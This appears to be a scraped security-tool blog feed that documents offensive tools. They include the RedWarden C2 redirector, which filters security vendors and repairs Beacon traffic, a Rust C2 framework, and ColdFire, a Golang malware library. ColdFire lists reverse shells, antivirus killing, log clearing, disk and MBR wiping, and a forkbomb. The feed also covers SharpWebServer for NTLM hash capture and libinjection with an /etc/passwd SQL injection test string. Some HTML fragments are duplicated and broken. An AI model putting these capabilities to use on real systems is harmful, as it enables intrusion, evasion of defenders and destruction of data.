"reverse_ip": ""
}

Now you see that the former one had "country": "Poland" whereas the latter "country": "India". With that knowledge we are ready to devise our constraints in form of a hefty YAML dictionary:

ip_geolocation_requirements:
organization:
continent:
continent_code:
country:
- Poland
- PL
- Polska
country_code:
city:
timezone:

Each of that dictionary's entries accept regular expression to be matched upon determined IP Geo metadata of inbound peer's IP address. We use three entries in country property to allow requests having one of specified values.

Having that set in your configuration, you can verify whether another IP address would get passed through RedWarden's IP Geolocation discriminator or not with ipLookupHelper utility accepting second parameter:



The very last line tells you whether packet would be blocked or accepted.

And that's all! Configure your IP Geolocation constraints wisely and safely, carefully inspect RedWarden logs for any IP Geo-related DROP entries and keep your C2 traffic nice and tidy!


Repair tampered Beacon requests

If you happen to use interim systems such as AWS Lambda or CloudFlare as your Domain Fronting / redirectors, you have surely came across a situation where some of your packets couldn't get accepted by the Teamserver as they deviated from the agreed malleable contract. Was it a tampered or removed HTTP header, reordered cookies or anything else - I bet that wasted plenty hours of your life.

To combat C2 channels setup process issues and interim systems tamperings, RedWarden offers functionality to repair Beacon packets.

It does so by checking what Malleable Profile expects packet to be and can restore configured HTTP headers to their agreed values according to the profile's requirements.

Consider following simple profile:

http-get {
set uri "/api/abc";
client {

header "Accept-Encoding" "gzip, deflate";

metadata {
base64url;
netbios;
base64url;
parameter "auth";
}
}
...

You see this Accept-Encoding? Every Beacon request has to come up with that Header and that value. What happens if your Beacon hits CloudFlare systems and they emit a request that will be stripped from that Header or will have Accept-Encoding: gzip instead? Teamserver will drop the request on the spot.

By setting this header in RedWarden configuration section dubbed protect_these_headers_from_tampering you can safe your connection.:

#
# If RedWarden validates inbound request's HTTP headers, according to policy drop_malleable_without_expected_header_value:
# "[IP: DROP, reason:6] HTTP request did not contain expected header value:"
#
# and senses some header is missing or was overwritten along the wire, the request will be dropped. We can relax this policy
# a bit however, since there are situations in which Cache systems (such as Cloudflare) could tamper with our requests thus
# breaking Malleable contracts. What we can do is to specify list of headers, that should be overwritten back to their values
# defined in provided Malleable profile.
#
# So for example, if our profile expects:
# header "Accept-Encoding" "gzip, deflate";
#
# but we receive a request having following header set instead:
# Accept-Encoding: gzip
#
# Because it was tampered along the wire by some of the interim systems (such as web-proxies or caches), we can
# d etect that and set that header's value back to what was expected in Malleable profile.
#
# In order to protect Accept-Encoding header, as an example, the following configuration could be used:
# protect_these_headers_from_tampering:
# - Accept-Encoding
#
#
# Default: <empty-list>
#
protect_these_headers_from_tampering:
- Accept-Encoding

Example outputs

Let's take a look at the output the proxy produces.

Under verbose: True option, the verbosity will be set to INFO at most telling accepted requests from dropped ones.

The request may be accepted if it confronted to all of the criterias configured in RedWarden's configuration file. Such a situation will be followed with [ALLOW, ...] entry log:

[INFO] 2021-04-24/17:30:48: [REQUEST] GET /js/scripts.js
[INFO] 2021-04-24/17:30:48: == Valid malleable http-get (variant: default) request inbound.
[INFO] 2021-04-24/17:30:48: [ALLOW, 2021-04-24/19:30:48, 111.222.223.224] "/js/scripts.js" - UA: "Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko"
[INFO] 2021-04-24/17:30:48: Connected peer sent 2 valid http-get and 0 valid http-post requests so far, out of 15/5 required to consider him temporarily trusted
[INFO] 2021-04-24/17:30:48: Plugin redirected request from [attacker.com] to [127.0.0.1:5555]

Should the request fail any of the checks RedWarden carries on each request, the corresponding [DROP, ...] line will be emitted containing information about the drop reason.:

[INFO] 2021-04-24/16:48:28: [REQUEST] GET /
[ERROR] 2021-04-24/16:48:29: [DROP, 2021-04-24/18:48:28, reason:1, 128.14.211.186] inbound User-Agent differs from the one defined in C2 profile.
[INFO] 2021-04-24/16:48:29: [DROP, 2021-04-24/18:48:28, 128.14.211.186] "/" - UA: "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36"
[ERROR] 2021-04-24/16:48:29: [REDIRECTING invalid request from 128.14.211.186 (zl-dal-us-gp3-wk107.internet-census.org)] GET /

Drop Policies Fine-Tuning

There are plenty of reasons dictating whether request can be dropped. Each of these checks can be independently turned on and off according to requirements or in a process of fine-tuning or erroneus decision fixing:

Excerpt from example-config.yaml:

#
# Fine-grained requests dropping policy - lets you decide which checks
# you want to have enforced and which to skip by setting them to False
#
# Default: all checks enabled
#
policy:
# [IP: ALLOW, reason:0] Request conforms ProxyPass entry (url="..." host="..."). Passing request to specified host
allow_proxy_pass: True
# [IP: ALLOW, reason:2] Peer's IP was added dynamically to a whitelist based on a number of allowed requests
allow_dynamic_peer_whitelisting: True
# [IP: DROP, reason:1] inbound User-Agent differs from the one defined in C2 profile.
drop_invalid_useragent: True
# [IP: DROP, reason:2] HTTP header name contained banned word
drop_http_banned_header_names: True
# [IP: DROP, reason:3] HTTP header value contained banned word:
drop_http_banned_header_value: True
# [IP: DROP, reason:4b] peer's reverse-IP lookup contained banned word
drop_dangerous_ip_reverse_lookup: True
# [IP: DROP, reason:4e] Peer's IP geolocation metadata contained banned keyword! Peer banned in generic fashion.
drop_ipgeo_metadata_containing_banned_keywords: True
# [IP: DROP, reason:5] HTTP request did not contain expected header
drop_malleable_without_expected_header: True
# [IP: DROP, reason:6] HTTP request did not contain expected header value:
drop_malleable_without_expected_header_value: True
# [IP: DROP, reason:7] HTTP request did not contain expected (metadata|id|output) section header:
drop_malleable_without_expected_request_section: True
# [IP: DROP, reason:8] HTTP request was expected to contain (metadata|id|output) section with parameter in URI:
drop_malleable_without_request_section_in_uri: True
# [IP: DROP, reason:9] Did not found append pattern:
drop_malleable_without_prepend_pattern: True
# [IP: DROP, reason:10] Did not found append pattern:
drop_malleable_without_apppend_patt ern: True
# [IP: DROP, reason:11] Requested URI does not aligns any of Malleable defined variants:
drop_malleable_unknown_uris: True
# [IP: DROP, reason:12] HTTP request was expected to contain <> section with URI-append containing prepend/append fragments
drop_malleable_with_invalid_uri_append: True

By default all of these checks are enforced.

Turning debug: True will swamp your console buffer with plenty of log lines describing each step RedWarden takes in its complex decisioning process. If you want to see your requests and responses full bodies - set debug and trace to true and get buried in logging burden!


FAQ

- Can this program run without Malleable Profile?

Yes it can. However request inspection logic will be turned off, the rest should work fine: IP Geolocation enforcement, reverse-lookup logic, banned IPs list, etc.

- Can this program be easily adapted to other C2 frameworks as well? Like Mythic, Covenant, etc?

Easily no. With some efforts - yes. As I've described below, the tool is written badly that will make other C2s adaptation a pain. However that's totally doable given some time and effort.

- My packets are getting dropped. Why?

Try to enable debug: True and trace: True to collect as many log as possible. Then you would need to go through logs and inspect what's going on. Do the packets look exactly how you expected them in your Malleable profile? Or maybe there was a subtle tamperation along the network that causes RedWarden to drop the packet (and it could make Teamserver drop it as well?).


Known Issues
  • It may add a slight overhead to the interactive sleep throughput
  • ProxyPass processing logic is far from perfect and is really buggy (and oh boy its ugly!).
  • Weird forms of configuration files can derail RedWarden parser and make it complain. Easiest approach to overcome this would be to copy example-config.yaml and work on it instead.

Oh my god why is this code such an engineerical piece of crap?

The code is ONE FUCKING BIG HELL OF A MESS - I admit that - and there's an honest reason for that too: the project was being developed 90% during the actual Red Team engagements. As we all know, these sorts of engagements entail so many things to do, leaving close to no time for a proper complex tool development. Not to mention criticality of this program in project's setup. The tool initialy started as a simple proxy script written in Python2, to then evolve as a proxy with plugins, received malleable_redirector plugin - and since then I've been trying really hard to keep proxy2 maintain backwards compatibility (poor me, I was like Microsoft!) with other plugins I've made for it and stick to its original purpose.

Time has come though to let it go, rebrand it and start fixing all the bad code smells introduced.

With all that said, please do express some level of compassion for me when raising issues, submitting pull requests and try to help rather than judge! :-) Thanks!


TODO
  • Research possibility to use Threat Intelligence feeds to nefarious purposes - like for instance detecting Security Vendors based on IPs
  • Add support for MaxMind GeoIP database/API
  • Implement support for JA3 signatures in both detection & blocking and impersonation to fake nginx/Apache2/custom setups.
  • Add some unique beacons tracking logic to offer flexilibity of refusing staging and communication processes at the proxy's own discretion
  • Introduce day of time constraint when offering redirection capabilities (proxy only during office hours)
  • Add Proxy authentication and authorization logic on CONNECT/relay.
  • Add Mobile users targeted redirection
  • Add configuration options to define custom HTTP headers to be injected, or ones to be removed
  • Add configuration options to require specific HTTP headers to be present in requests passing ProxyPass criteria.
  • Interactive interface allowing to type simple characters controlling output logging verbosity, similarly to Nmap's
  • Rewrite Malleable profile parser logic to pyMalleableC2. When I first started coding my own parser logic, there was no such toolkit on Github.
  • Refactor all the codebase

Author
Mariusz B. / mgeeky, '19-'21
<mb@binary-offensive.com>



Totp-Ssh-Fluxer - Take Security By Obscurity To The Next Level (This Is A Bad Idea, Don'T Really Use This Please)

$
0
0


Some people change their SSH port on their servers so that it is slightly harder to find for bots or other nasties, and while that is generally viewed as an action of security through obscurity it does work very well at killing a lot of the automated logins you always see in /var/log/auth.log

However what if we could go take this to a ridiculous level? What if we could use TOTP codes that are normally used as 2nd factor codes to login to websites to actually know what port the sshd server is listening on?

For this, I present totp-ssh-flux, a way to make sure your sshd port changes every 30 seconds, and possibly causing your adversaries a small period of frustration.


What you can see here is my phone (using a generic TOTP client) generating codes, that I can then use as the port to SSH into on a server.

The software behind it is fairly simple, It runs in a loop that does the following

  • Generates a TOTP token
  • Takes the last digit, if the result is above 65536, do that again
  • Adds a iptables PREROUTING rule to redirect that number generated above
  • Waits 30 seconds, removes that rule, repeat.

The neat thing is, because this is done in PREROUTING, even if the code expires, established connections stay connected.


Installation

You will most likely find more up to date instructions on the totp-ssh-flux project readme

Beware, currently I would not really recommend running this software, it was only written as a joke.

At the time of writing the project is just a single file, You will need to install golang and then go get and go build

Run the program as root ( it needs to, sorry, it's editing iptables )

Upon first run, the program will generate a token for the host in /etc/ssh-flux-key ( you can use the -keypath option to change that ) and you can input that into your phone or other clients.

You can confirm it works by running watch iptables -vL -t nat and waiting for the iptables rules to be inserted and removed.


Want to see more insanity like this? Follow me on twitter@benjojo12




Link - A Command And Control Framework Written In Rust

$
0
0


link is a command and control framework written in rust. Currently in beta.


Introduction

link provides MacOS, Linux and Windows implants which may lack the necessary evasive tradecraft provided by other more mature command and control frameworks.

Tested on Linux only.


Features

Hopefully this list expands for humans to actually want to use this:

  • HTTPS communication
  • Process injection
  • In-memory .NET assembly execution
  • SharpCollection tools
  • sRDI implementation for shellcode generation
  • Windows link reloads DLLs from disk into current process

Feedback

Feel free to file an issue.


Build Process
  • Clone or download the repo
  • cargo run if you are eager to run it right now
  • cargo build --release to build the link server executable

For more information check out Installation and Usage.


Acknowledgments

A non-exhaustive list of those who have in some way inspired this project by means of writing code, snippets, ideas or inspiration:

@rust
@moloch--
@djhohnstein
@lesnuages
@Flangvik
@monoxgas
@b4rtik



ColdFire - Golang Malware Development Library

$
0
0


Golang malware development framework


Introduction

ColdFire provides various methods useful for malware development in Golang.

Most functions are compatible with both Linux and Windows operating systems.


Installation

go get github.com/redcode-labs/ColdFire


Types of functions included
  • Logging
  • Auxiliary
  • Reconnaissance
  • Evasion
  • Administration
  • Sandbox detection
  • Disruptive

Documentation

Logging functions
func F(s string, arg ...interface{}) string 
Alias for fmt.Sprintf

func PrintGood(msg string)
Print good status message

func PrintInfo(msg string)
Print info status message

func PrintError(msg string)
Print error status message

func PrintWarning(msg string)
Print warning status message


Auxiliary functions
func FileToSlice(file string) []string
Read from file and return slice with lines delimited with newline.

func Contains(s interface{}, elem interface{}) bool
Check if interface type contains another interface type.

func StrToInt(string_integer string) int
Convert string to int.

func IntToStr(i int) string
Converts int to string.

func IntervalToSeconds(interval string) int
Converts given time interval to seconds.

func RandomInt(min int, max int) int
Returns a random int from range.

func RandomSelectStr(list []string) string
Returns a random selection from slice of strings.

func RandomSelectInt(list []int) int
Returns a random selection from slice of ints.

func RandomSelectStrNested(list [][]string) []string
Returns a random selection from nested string slice.

func RemoveNewlines(s string) string
Removes "\n" and "\r" characters from string.

func FullRemove(str string, to_remove string) string
Removes all occurences of substring.

func RemoveDuplicatesStr(slice []string) []string
Removes duplicates from string slice.

func RemoveDuplicatesInt(slice []int) []int
Removes duplicates from int slice.

func ContainsAny(str string, elements []string) bool
Returns true if slice contains a string.

func RandomString(n int) string
Generates random string of length [n]

func ExitOnError(e error)
Handle errors

func Md5Hash(str string) string
Returns MD5 checksum of a string

func MakeZip(zip_file string, files []string) error
Creates a zip archive from a list of files

func ReadFile(filename string) (string, error)
Read contents of a file.

func WriteFile(filename string) error
Write contents to a file.

func B64d(str string) string
Returns a base64 decoded string

func B64e(str string) string
Returns a base64 encoded string

func FileExists(file string) bool
Check if file exists.

func ParseCidr(cidr string) ([]string, error)
Returns a slice containing all possible IP addresses in the given range.


Reconnaissance functions
wireless interface and it's MAC address. func Ifaces() []string Returns slice containing names of all local interfaces. func Disks() ([]string, error) Lists local storage devices func Users() []string, err Returns list of known users. func Info() map[string]string Returns basic system information. Possible fields: username, hostname, go_os, os, platform, cpu_num, kernel, core, local_ip, ap_ip, global_ip, mac. If the field cannot be resolved, it defaults to "N/A" value. func DnsLookup(hostname string) ([]string, error) Performs DNS lookup func RdnsLookup(ip string) ([]string, error) Performs reverse DNS lookup func HostsPassive(interval string) []string, err Passively discovers active hosts on a network using ARP monitoring. Discovery time can be changed using <interval> argument. func FilePermissions(filename string) (bool,bool) Checks if file has read and write permissions. func Portscan(target string, timeout, threads int) []int Returns list of open ports on target. func PortscanSingle(target string, port int) bool Returns true if selected port is open. func BannerGrab(target string, port int) (string, error) Grabs a service banner string from a given port. func Networks() ([]string, error) Returns list of nearby wireless networks. ">

func GetLocalIp() string
Returns a local IP address of the machine.

func GetGlobalIp() string
Returns a global IP address of the machine.

func IsRoot() bool
Check if user has administrative privilleges.

func Processes() (map[int]string, error)
Returns all processes' PIDs and their corresponding names.

func Iface() string, string
Returns name of currently used wireless interface and it's MAC address.

func Ifaces() []string
Returns slice containing names of all local interfaces.

func Disks() ([]string, error)
Lists local storage devices

func Users() []string, err
Returns list of known users.

func Info() map[string]string
Returns basic system information.
Possible fields: username, hostname, go_os, os,
platform, cpu_num, kernel, core, local_ip, ap_ip, global_ip, mac.
If the field cannot be resolved, it defaults to "N/A" value.

func DnsLookup(hostname string) ([]string, error)
Performs DNS lookup

func RdnsLookup(ip string) ([]string, error)
Performs reverse DNS lookup

func HostsPassive(interval string) []string, err
Passively discovers active hosts on a network using ARP monitoring.
Discovery time can be changed using <interval> argument.

func FilePermissions(filename string) (bool,bool)
Checks if file has read and write permissions.

func Portscan(target string, timeout, threads int) []int
Returns list of open ports on target.

func PortscanSingle(target string, port int) bool
Returns true if selected port is open.

func BannerGrab(target string, port int) (string, error)
Grabs a service banner string from a given port.

func Networks() ([]string, error)
Returns list of nearby wireless ne tworks.


Administration functions
func CmdOut(command string) string, error
Execute a command and return it's output.

func CmdOutPlatform(commands map[string]string) (string, error)
Executes commands in platform-aware mode.
For example, passing {"windows":"dir", "linux":"ls"} will execute different command,
based on platform the implant was launched on.

func CmdRun(command string)
Unlike cmd_out(), cmd_run does not return anything, and prints output and error to STDOUT.

func CmdDir(dirs_cmd map[string]string) ([]string, error)
Executes commands in directory-aware mode.
For example, passing {"/etc" : "ls"} will execute command "ls" under /etc directory.

func CmdBlind(command string)
Run command without supervision, do not print any output.

func CreateUser(username, password string) error
Creates a new user on the system.

func Bind(port int)
Run a bind shell on a given port.

func Reverse(host string, port int)
Run a reverse shell.

func SendDataTcp(host string, port int, data string) error
Sends string to a remote host using TCP protocol.

func SendDataUdp(host string, port int, data string) error
Sends string to a remote host using UDP protocol.

func Download(url string) error
Downloads a file from url and save it under the same name.

func CopyFile(src string, dst string) error
Copy a file from one place to another

func CurrentDirFiles() []string, error
Returns list of files from current directory

Evasion functions
func PkillPid(pid int) error
Kill process by PID.

func PkillName(name string) errror
Kill all processes that contain [name].

func PkillAv() err
Kill most common AV processes.

func Wait(interval string)
Does nothing for a given interval of time.

func Remove()
Removes binary from the host.

func SetTtl(interval string)
Set time-to-live of the binary.
Should be launched as goroutine.

func ClearLogs() error
Clears most system logs.

Sandbox detection functions
func SandboxFilepath() bool 
Detect sandbox by looking for common sandbox filepaths.
Compatible only with windows.

func SandboxProc() bool
Detect sandbox by looking for common sandbox processes.

func SandboxSleep() bool
Detect sandbox by looking for sleep-accelleration mechanism.

func SandboxDisk(size int) bool
Detect sandbox by looking for abnormally small disk size.

func SandboxCpu(cores int) bool
Detect sandbox by looking for abnormally small number of cpu cores.

func SandboxRam(ram_mb int) bool
Detect sandbox by looking for abnormally small amount of RAM.

func SandboxMac() bool
Detect sandbox by looking for sandbox-specific MAC address of the localhost.

func SandboxUtc() bool
Detect sandbox by looking for properly set UTC time zone.

func SandboxProcnum(proc_num int) bool
Detect sandbox if small number of running p rocesses

func SandboxTmp(entries int) bool
Detect sandbox if small number of entries under remporary dir

func SandboxAll() bool
Detect sandbox using all sandbox detection methods.
Returns true if any sandbox-detection method returns true.

func SandboxAll_n(num int) bool
Detect sandbox using all sandbox detection methods.
Returns true if at least <num> detection methods return true.

Disruptive functions
func WifiDisconnect() error 
Disconnects from wireless access point

func Wipe() error
Wipes out entire filesystem.

func EraseMbr(device string, partition_table bool) error
Erases MBR sector of a device.
If <partition_table> is true, erases also partition table.

func Forkbomb()
Runs a forkbomb.

func Shutdown() error
Reboot the machine.


Requirements
"github.com/google/gopacket"
"github.com/google/gopacket/layers"
"github.com/google/gopacket/pcap"
"github.com/robfig/cron"
"github.com/anvie/port-scanner"
"github.com/matishsiao/goInfo"
"github.com/fatih/color"
"github.com/minio/minio/pkg/disk"
"github.com/dustin/go-humanize"
"github.com/mitchellh/go-ps"

Disclaimer

Developers are not responsible for any misuse regarding this tool. Use it only against systems that you are permitted to attack.



Bbscope - Scope Gathering Tool For HackerOne, Bugcrowd, And Intigriti!

$
0
0


The ultimate scope gathering tool for HackerOne, Bugcrowd, and Intigriti by sw33tLie.

Need to grep all the large scope domains that you've got on your bug bounty platforms? This is the right tool for the job.
What about getting a list of android apps that you are allowed to test? We've got you covered as well.

Reverse engineering god? No worries, you can get a list of binaries to analyze too :)


Installation

Make sure you've a recent version of the Go compiler installed on your system. Then just run:

GO111MODULE=on go get -u github.com/sw33tLie/bbscope

Usage
bbscope (h1|bc|it) -t <session-token> <other-flags>

How to get the session token:

  • HackerOne: login, then grab the __Host-session cookie
  • Bugcrowd: login, then grab the _crowdcontrol_session cookie
  • Intigriti: login, then intercept a request to api.intigriti.com and look for the Authentication: Bearer XXX header. XXX is your token

Remember that you can use the --help flag to get a description for all flags.


Examples

Below you'll find some example commands. Keep in mind that all of them work with Bugcrowd and Intigriti subcommands (bc and it) as well, not just with h1.


Print all in-scope targets from all your HackerOne programs that offer rewards
bbscope h1 -t <YOUR_TOKEN> -b -o t

The output will look like this:

app.example.com
*.user.example.com
*.demo.com
www.something.com

Print all in-scope targets from all your private HackerOne programs that offer rewards
bbscope h1 -t <YOUR_TOKEN> -b -p -o t

Print all in-scope Android APKs from all your HackerOne programs
bbscope h1 -t <YOUR_TOKEN> -o t -c android

Print all in-scope targets from all your HackerOne programs with extra data
bbscope h1 -t <YOUR_TOKEN> -o tdu -d ", "

This will print a list of in-scope targets from all your HackerOne programs (including public ones and VDPs) but, on the same line, it will also print the target description (when available) and the program's URL. It might look like this:

something.com, Something's main website, https://hackerone.com/something
*.demo.com, All assets owned by Demo are in scope, https://hackerone.com/demo

Get program URLs for your HackerOne private programs
bbscope h1 -t <YOUR_TOKEN> -o u -p | sort -u

You'll get a list like this:

https://hackerone.com/demo
https://hackerone.com/something

Beware of scope oddities

In an ideal world, all programs use the in-scope table in the same way to clearly show what's in scope, and make parsing easy. Unfortunately, that's not always the case.

Sometimes assets are assigned the wrong category. For example, if you're going after URLs using the -c url, double checking using -c all is often a good idea.

Other times, on HackerOne, you will find targets written in the scope description, instead of in the scope title. A few programs that do this are:

If you want to grep those URLs as well, you MUST include d in the printing options flag (-o).

Sometimes it gets even stranger: Spotify uses titles of the in-scope table to list wildcards, but then lists the actually in-scope subdomains in the targets description.

Human minds are weird and this tool does not attempt to parse nonsense, you'll have to do that manually (or bother people that can make this change, maybe?).


Thanks


SharpWebServer - HTTP And WebDAV Server With Net-NTLM Hashes Capture Functionality

$
0
0


A Red Team oriented simple HTTP & WebDAV server written in C# with functionality to capture Net-NTLM hashes. To be used for serving payloads on compromised machines for lateral movement purposes.

Requires .NET Framework 4.5 and System.Net and System.Net.Sockets references.


Usage
    :: SharpWebServer ::
a Red Team oriented C# Simple HTTP Server with Net-NTLMv1/2 hashes capture functionality

Authors:
- Can Güney Aksakalli (github.com/aksakalli) - original implementation
- harrypatrick442 (github.com/harrypatrick442) - aksakalli's fork & changes
- Dominic Chell (@domchell) from MDSec - Net-NTLMv2 hashes capture code borrowed from Farmer
- Mariusz B. / mgeeky, <mb [at] binary-offensive.com> - combined all building blocks together,
added connection keep-alive to NTLM Authentication

Usage:
SharpWebServer.exe <port=port> [dir=path] [verbose=true] [ntlm=true] [logfile=path]

Options:
port - TCP Port number on which to listen (1-65535)
dir - Directory with files to be hosted.
verbose - Turn verbose mode on.
seconds - Specifies h ow long should the server be running. Default: indefinitely
ntlm - Require NTLM Authentication before serving files. Useful to collect NetNTLMv2 hashes
(in MDSec's Farmer style)
logfile - Path to output logfile.

Example

Example use-case serving files and capturing Net-NTLM hashes at the same time:

Server:

WebDAV Server with Net-NTLM hashes capture functionality Authors: - Dominic Chell (@domchell) from MDSec - Net-NTLM hashes capture code borrowed from Farmer - Mariusz B. / mgeeky, <mb [at] binary-offensive.com> - WebDAV implementation, NTLM Authentication keep-alive, all the rest. Usage: SharpWebServer.exe <port=port> [dir=path] [verbose=true] [ntlm=true] [logfile=path] Options: port - TCP Port number on which to listen (1-65535) dir - Directory with files to be hosted. verbose - Turn verbose mode on. seconds - Specifies how long should the server be running. Default: indefinitely ntlm - Require NTLM Authentication before serving files. Useful to collect NetNTLM hashes (in MDSec's Farmer style) logfile - Path to output logfile. ">
C:\> SharpWebServer.exe port=8888 dir=C:\Windows\Temp verbose=true ntlm=true

:: SharpWebServer ::
a Red Team oriented C# Simple HTTP & WebDAV Server with Net-NTLM hashes capture functionality

Authors:
- Dominic Chell (@domchell) from MDSec - Net-NTLM hashes capture code borrowed from Farmer
- Mariusz B. / mgeeky, <mb [at] binary-offensive.com> - WebDAV implementation, NTLM Authentication keep-alive,
all the rest.

Usage:
SharpWebServer.exe <port=port> [dir=path] [verbose=true] [ntlm=true] [logfile=path]

Options:
port - TCP Port number on which to listen (1-65535)
dir - Directory with files to be hosted.
verbose - Turn verbose mode on.
seconds - Specifies how long should the server be running. Default: indefinitely
ntlm - Require NTLM Authentication befo re serving files. Useful to collect NetNTLM hashes
(in MDSec's Farmer style)
logfile - Path to output logfile.

Client:

C:\> curl -sD- http://localhost:8888/test.txt --ntlm --negotiate -u TestUser:TestPassword
HTTP/1.1 401 Unauthorized
Transfer-Encoding: chunked
WWW-Authenticate: NTLM
Date: Mon, 29 Mar 2021 15:55:14 GMT

HTTP/1.1 401 Unauthorized
Transfer-Encoding: chunked
WWW-Authenticate: NTLM TlRMTVNTUAACAAAABgAGADgAAAAFAomiESIzRFVmd4gAAAAAAAAAAIAAgAA+AAAABQLODgAAAA9TAE0AQgACAAYAUwBNAEIAAQAWAFMATQBCAC0AVABPAE8ATABLAEkAVAAEABIAcwBtAGIALgBsAG8AYwBhAGwAAwAoAHMAZQByAHYAZQByADIAMAAwADMALgBzAG0AYgAuAGwAbwBjAGEAbAAFABIAcwBtAGIALgBsAG8AYwBhAGwAAAAAAA==
Date: Mon, 29 Mar 2021 15:55:14 GMT

HTTP/1.1 200 OK
Content-Length: 6
Content-Type: text/plain
Date: Mon, 29 Mar 2021 15:55:14 GMT

foobar

WebDAV client:

C:\> dir \\localhost@8888\test
Volume in drive \\localhost@8888\test has no label.
Volume Serial Number is 0000-0000

Directory of \\localhost@8888\test

30.03.2021 05:12 <DIR> .
30.03.2021 05:12 <DIR> ..
30.03.2021 04:27 11 test2.txt
30.03.2021 05:12 12 test3.txt
30.03.2021 05:12 <DIR> test4
2 File(s) 23 bytes
3 Dir(s) 225 268 776 960 bytes free

C:\> type \\localhost@8888\test\test4\test5.txt
Hello world!

C:\> copy \\localhost@8888\test\test4\test5.txt .
1 file(s) copied.

Authors
  • NTLM hashes capture code & TCP Listener backbone borrowed from MDSec ActiveBreach Farmer project written by Dominic Chell (@domchell):

  • WebDAV implementation, NTLM Authentication keep-alive logic & all the rest Mariusz B. / mgeeky, '21, <mb [at] binary-offensive.com>



Libinjection - SQL / SQLI Tokenizer Parser Analyzer

$
0
0


SQL / SQLI tokenizer parser analyzer. For

See https://www.client9.com/ for details and presentations.


Simple example:

fingerprint of '%s'\n", state.fingerprint); } return issqli; } ">
#include <stdio.h>
#include <strings.h>
#include <errno.h>
#include "libinjection.h"
#include "libinjection_sqli.h"

int main(int argc, const char* argv[])
{
struct libinjection_sqli_state state;
int issqli;

const char* input = argv[1];
size_t slen = strlen(input);

/* in real-world, you would url-decode the input, etc */

libinjection_sqli_init(&state, input, slen, FLAG_NONE);
issqli = libinjection_is_sqli(&state);
if (issqli) {
fprintf(stderr, "sqli detected with fingerprint of '%s'\n", state.fingerprint);
}
return issqli;
}
$ gcc -Wall -Wextra examples.c libinjection_sqli.c
$ ./a.out "-1' and 1=1 union/* foo */select load_file('/etc/passwd')--"
sqli detected with fingerprint of 's&1UE'

More advanced samples:


VERSION INFORMATION

See CHANGELOG for details.

Versions are listed as "major.minor.point"

Major are significant changes to the API and/or fingerprint format. Applications will need recompiling and/or refactoring.

Minor are C code changes. These may include

  • logical change to detect or suppress
  • optimization changes
  • code refactoring

Point releases are purely data changes. These may be safely applied.


QUALITY AND DIAGNOSITICS

The continuous integration results at https://travis-ci.org/client9/libinjection tests the following:


EMBEDDING

The src directory contains everything, but you only need to copy the following into your source tree:



Viewing all 5816 articles
Browse latest View live


<script src="https://jsc.adskeeper.com/r/s/rssing.com.1596347.js" async> </script>